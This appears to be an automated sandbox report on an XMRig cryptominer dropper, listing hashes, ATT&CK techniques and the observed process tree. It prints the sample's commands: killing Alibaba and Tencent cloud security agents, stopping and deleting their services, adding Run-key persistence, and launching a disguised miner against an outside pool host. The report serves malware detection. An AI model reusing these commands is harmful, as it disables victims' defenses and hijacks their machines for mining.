xmrig | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

General

Target

70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Size

569KB
MD5

c85e27470e88ad0d0449ab68ef18d0a3
SHA1

4791330c3acf353772c3d073cc52a619eb4cd7cc
SHA256

70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA512

39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Score

10^/10

xmrig evasion miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

htttp.exeredis-server.exe

pid process

3900 htttp.exe
4768 redis-server.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3900	htttp.exe
4768	redis-server.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

htttp.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"	htttp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"	htttp.exe

Drops file in Windows directory 2 IoCs

Processes:

70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe

description	ioc	process
File created	C:\Windows\htttp.exe	70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
File opened for modification	C:\Windows\htttp.exe	70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

860 tasklist.exe
1396 tasklist.exe
1560 tasklist.exe
1820 tasklist.exe

pid	process
860	tasklist.exe
1396	tasklist.exe
1560	tasklist.exe
1820	tasklist.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2288	taskkill.exe
2520	taskkill.exe
4524	taskkill.exe
4608	taskkill.exe
972	taskkill.exe
2960	taskkill.exe
1568	taskkill.exe
2096	taskkill.exe
3112	taskkill.exe
4572	taskkill.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeredis-server.exe

description	pid	process
Token: SeDebugPrivilege	860	tasklist.exe
Token: SeDebugPrivilege	1396	tasklist.exe
Token: SeDebugPrivilege	1560	tasklist.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2096	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeLockMemoryPrivilege	4768	redis-server.exe
Token: SeLockMemoryPrivilege	4768	redis-server.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exehtttp.execmd.exe

description	pid	process	target process
PID 4804 wrote to memory of 3900	4804	70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe	htttp.exe
PID 4804 wrote to memory of 3900	4804	70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe	htttp.exe
PID 4804 wrote to memory of 3900	4804	70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe	htttp.exe
PID 3900 wrote to memory of 812	3900	htttp.exe	cmd.exe
PID 3900 wrote to memory of 812	3900	htttp.exe	cmd.exe
PID 3900 wrote to memory of 812	3900	htttp.exe	cmd.exe
PID 812 wrote to memory of 860	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 860	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 860	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1396	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1396	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1396	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1560	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1560	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1560	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1820	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1820	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1820	812	cmd.exe	tasklist.exe
PID 812 wrote to memory of 1568	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 1568	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 1568	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2288	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2288	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2288	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2520	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2520	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2520	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2096	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2096	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 2096	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 3112	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 3112	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 3112	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 3352	812	cmd.exe	sc.exe
PID 812 wrote to memory of 3352	812	cmd.exe	sc.exe
PID 812 wrote to memory of 3352	812	cmd.exe	sc.exe
PID 812 wrote to memory of 3880	812	cmd.exe	sc.exe
PID 812 wrote to memory of 3880	812	cmd.exe	sc.exe
PID 812 wrote to memory of 3880	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4060	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4060	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4060	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4480	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4480	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4480	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4068	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4068	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4068	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4052	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4052	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4052	812	cmd.exe	sc.exe
PID 812 wrote to memory of 1940	812	cmd.exe	sc.exe
PID 812 wrote to memory of 1940	812	cmd.exe	sc.exe
PID 812 wrote to memory of 1940	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4040	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4040	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4040	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4564	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4564	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4564	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4576	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4576	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4576	812	cmd.exe	sc.exe
PID 812 wrote to memory of 4524	812	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
"C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\htttp.exe
"C:\Windows\htttp.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI " IMAGENAME eq Ali_update.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI " IMAGENAME eq aliyun_installer.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM aliyun_assist_service.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM aliyun_assist_update.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM aliyun_installer.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM Ali_update.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM AliHids.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\SysWOW64\sc.exe
sc stop "Alibaba Security Aegis Detect Service"
4⤵
PID:3352

C:\Windows\SysWOW64\sc.exe
sc stop "Alibaba Security Aegis Update Service"
4⤵
PID:3880

C:\Windows\SysWOW64\sc.exe
sc delete "Alibaba Security Aegis Detect Service"
4⤵
PID:4060

C:\Windows\SysWOW64\sc.exe
sc delete "Alibaba Security Aegis Update Service"
4⤵
PID:4480

C:\Windows\SysWOW64\sc.exe
sc stop "BaradAgentSvc"
4⤵
PID:4068

C:\Windows\SysWOW64\sc.exe
sc stop "StargateSvc"
4⤵
PID:4052

C:\Windows\SysWOW64\sc.exe
sc stop "QPCore"
4⤵
PID:1940

C:\Windows\SysWOW64\sc.exe
sc delete "BaradAgentSvc"
4⤵
PID:4040

C:\Windows\SysWOW64\sc.exe
sc delete "StargateSvc"
4⤵
PID:4564

C:\Windows\SysWOW64\sc.exe
sc delete "QPCore"
4⤵
PID:4576

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM QQProtect.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sgagent.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BaradAgent.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM YDLive.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM YDService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Users\Admin\AppData\Local\Temp\redis-server.exe
"C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Process Discovery

1

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\redis-server.exe
MD5
0c4ae60bb07bd7c084ca66b844fa0b4b

SHA1
ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

SHA256
31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

SHA512
5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\redis-server.exe
MD5
0c4ae60bb07bd7c084ca66b844fa0b4b

SHA1
ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

SHA256
31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

SHA512
5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\run.bat
MD5
f1cc668d01eeb779b1fc1044541fc1d4

SHA1
45bd782881b31eb2868fc211b19af2cb627a9d0d

SHA256
62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929

SHA512
293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e

Download Submit
C:\Windows\htttp.exe
MD5
c85e27470e88ad0d0449ab68ef18d0a3

SHA1
4791330c3acf353772c3d073cc52a619eb4cd7cc

SHA256
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

SHA512
39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Download Submit
C:\Windows\htttp.exe
MD5
c85e27470e88ad0d0449ab68ef18d0a3

SHA1
4791330c3acf353772c3d073cc52a619eb4cd7cc

SHA256
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

SHA512
39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Download Submit
memory/812-117-0x0000000000000000-mapping.dmp

Download
memory/860-119-0x0000000000000000-mapping.dmp

Download
memory/972-141-0x0000000000000000-mapping.dmp

Download
memory/1396-120-0x0000000000000000-mapping.dmp

Download
memory/1560-121-0x0000000000000000-mapping.dmp

Download
memory/1568-123-0x0000000000000000-mapping.dmp

Download
memory/1820-122-0x0000000000000000-mapping.dmp

Download
memory/1940-134-0x0000000000000000-mapping.dmp

Download
memory/2096-126-0x0000000000000000-mapping.dmp

Download
memory/2288-124-0x0000000000000000-mapping.dmp

Download
memory/2520-125-0x0000000000000000-mapping.dmp

Download
memory/2960-142-0x0000000000000000-mapping.dmp

Download
memory/3112-127-0x0000000000000000-mapping.dmp

Download
memory/3352-128-0x0000000000000000-mapping.dmp

Download
memory/3880-129-0x0000000000000000-mapping.dmp

Download
memory/3900-114-0x0000000000000000-mapping.dmp

Download
memory/4040-135-0x0000000000000000-mapping.dmp

Download
memory/4052-133-0x0000000000000000-mapping.dmp

Download
memory/4060-130-0x0000000000000000-mapping.dmp

Download
memory/4068-132-0x0000000000000000-mapping.dmp

Download
memory/4480-131-0x0000000000000000-mapping.dmp

Download
memory/4524-138-0x0000000000000000-mapping.dmp

Download
memory/4564-136-0x0000000000000000-mapping.dmp

Download
memory/4572-139-0x0000000000000000-mapping.dmp

Download
memory/4576-137-0x0000000000000000-mapping.dmp

Download
memory/4608-140-0x0000000000000000-mapping.dmp

Download
memory/4768-143-0x0000000000000000-mapping.dmp

Download
memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmp

Filesize
15.4MB

Download
memory/4768-147-0x0000020D1E2C0000-0x0000020D1E2E0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads